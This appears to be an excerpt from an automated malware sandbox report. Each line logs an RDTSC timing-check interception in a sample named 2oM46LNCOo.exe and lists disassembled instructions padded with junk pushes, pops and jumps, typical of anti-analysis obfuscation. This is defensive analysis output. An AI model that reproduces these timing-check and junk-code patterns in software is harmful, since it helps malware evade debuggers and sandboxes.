Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A20E78 second address: A20E95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9D0B3549h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 99D08C second address: 99D092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A23F1C second address: A23F44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F6E9D0B3536h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jmp 00007F6E9D0B3548h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A2409D second address: A240B9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6E9CE04426h 0x00000008 jns 00007F6E9CE04426h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 jns 00007F6E9CE04426h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9A061C second address: 9A0628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A2B281 second address: A2B285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A2B6E8 second address: A2B6EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A2B6EF second address: A2B717 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F6E9CE0442Fh 0x00000008 jmp 00007F6E9CE04432h 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A2B9F2 second address: A2B9F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A2B9F6 second address: A2BA5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6E9CE04434h 0x0000000b je 00007F6E9CE0442Eh 0x00000011 jo 00007F6E9CE04426h 0x00000017 push edi 0x00000018 pop edi 0x00000019 push esi 0x0000001a jmp 00007F6E9CE0442Ch 0x0000001f pop esi 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 jbe 00007F6E9CE04426h 0x0000002a jns 00007F6E9CE04426h 0x00000030 jmp 00007F6E9CE04430h 0x00000035 popad 0x00000036 jno 00007F6E9CE04432h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 99809A second address: 9980A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A2E407 second address: A2E46C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9CE04432h 0x00000007 jmp 00007F6E9CE0442Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F6E9CE04439h 0x00000013 jns 00007F6E9CE0442Ah 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 jmp 00007F6E9CE04439h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A2E46C second address: A2E470 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A2E470 second address: A2E48C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F6E9CE04426h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jbe 00007F6E9CE04426h 0x00000015 jc 00007F6E9CE04426h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A2E48C second address: A2E4A6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F6E9D0B3545h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A2E7E9 second address: A2E7ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A34460 second address: A34481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F6E9D0B3549h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A34481 second address: A34487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A34487 second address: A34499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jmp 00007F6E9D0B353Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A330D9 second address: A330EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9CE0442Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A3321C second address: A33220 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A33220 second address: A33226 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A33226 second address: A3322C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A3322C second address: A33247 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E9CE04437h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A33247 second address: A33261 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9D0B3542h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A33261 second address: A33265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A33515 second address: A3351B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A3351B second address: A33539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 pushad 0x00000009 ja 00007F6E9CE04431h 0x0000000f jmp 00007F6E9CE0442Bh 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A33539 second address: A3353D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DCE65 second address: 9DCEBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9CE0442Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F6E9CE04428h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 mov edi, dword ptr [ebp+122D2E85h] 0x0000002d mov ebx, dword ptr [ebp+12486DC1h] 0x00000033 add edi, dword ptr [ebp+122D2F59h] 0x00000039 add eax, ebx 0x0000003b mov dword ptr [ebp+122D1DE3h], ebx 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 pushad 0x00000046 popad 0x00000047 push esi 0x00000048 pop esi 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A336A3 second address: A336A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A3C645 second address: A3C64B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A3C64B second address: A3C651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A3C651 second address: A3C672 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F6E9CE04431h 0x0000000a push ecx 0x0000000b jo 00007F6E9CE04426h 0x00000011 pop ecx 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A3A52E second address: A3A552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jnc 00007F6E9D0B3536h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6E9D0B3543h 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A3A552 second address: A3A565 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A3A565 second address: A3A56F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F6E9D0B3536h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A3A56F second address: A3A573 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A3A573 second address: A3A58D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E9D0B3544h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A3A875 second address: A3A879 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A3A879 second address: A3A891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E9D0B353Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A3A891 second address: A3A897 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A3A897 second address: A3A89B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A3A89B second address: A3A8A5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A3A8A5 second address: A3A8AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A3AB8A second address: A3ABC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F6E9CE0442Dh 0x0000000d pop ebx 0x0000000e jmp 00007F6E9CE04438h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 jl 00007F6E9CE04426h 0x0000001d pop eax 0x0000001e rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A3ABC3 second address: A3ABDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E9D0B3544h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A3ABDD second address: A3ABE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A3B455 second address: A3B466 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9D0B353Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A3B466 second address: A3B47A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F6E9CE0442Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A3B47A second address: A3B49E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop ebx 0x00000008 pushad 0x00000009 jnc 00007F6E9D0B353Ah 0x0000000f push ebx 0x00000010 jmp 00007F6E9D0B353Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A3BD14 second address: A3BD35 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F6E9CE04439h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A3BD35 second address: A3BD3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A45F89 second address: A45FC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F6E9CE04426h 0x0000000a jmp 00007F6E9CE04435h 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007F6E9CE04438h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A45FC4 second address: A45FF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F6E9D0B3548h 0x0000000c jmp 00007F6E9D0B353Bh 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A453F2 second address: A453F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A453F6 second address: A4541A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9D0B353Bh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6E9D0B3541h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A4541A second address: A4541E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A4541E second address: A4542A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A4542A second address: A45450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F6E9CE04426h 0x0000000a popad 0x0000000b push ebx 0x0000000c jmp 00007F6E9CE04438h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A45450 second address: A45455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A459B9 second address: A459C5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A45CA7 second address: A45CDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push ebx 0x00000009 jmp 00007F6E9D0B353Bh 0x0000000e jmp 00007F6E9D0B3540h 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F6E9D0B353Dh 0x0000001b push eax 0x0000001c pop eax 0x0000001d rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A4766D second address: A47682 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6E9CE0442Eh 0x00000008 push eax 0x00000009 pop eax 0x0000000a jbe 00007F6E9CE04426h 0x00000010 push edi 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A48AFB second address: A48B01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A48B01 second address: A48B0F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6E9CE04426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A48B0F second address: A48B13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A4FB15 second address: A4FB1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A500F2 second address: A5011B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9D0B353Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jc 00007F6E9D0B3538h 0x00000010 push edi 0x00000011 pop edi 0x00000012 push edi 0x00000013 jmp 00007F6E9D0B353Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A503BA second address: A503C9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop edi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A503C9 second address: A503D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A503D1 second address: A503DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A503DA second address: A503E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A503E0 second address: A503E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A506C9 second address: A506CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A5083D second address: A50841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A50841 second address: A50859 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9D0B353Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007F6E9D0B3536h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A4F704 second address: A4F714 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6E9CE04426h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A4F714 second address: A4F718 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A56EA1 second address: A56EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A56EA5 second address: A56EB3 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6E9D0B3536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A56EB3 second address: A56EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A56EB7 second address: A56EF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9D0B3541h 0x00000007 jmp 00007F6E9D0B353Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop esi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F6E9D0B3546h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A56EF3 second address: A56EF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A56EF7 second address: A56F1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F6E9D0B3543h 0x0000000f jnc 00007F6E9D0B3536h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A56F1A second address: A56F2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9CE04431h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A56F2F second address: A56F4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F6E9D0B353Fh 0x0000000c pushad 0x0000000d popad 0x0000000e jnl 00007F6E9D0B3536h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A59BA4 second address: A59BA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A59D07 second address: A59D0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
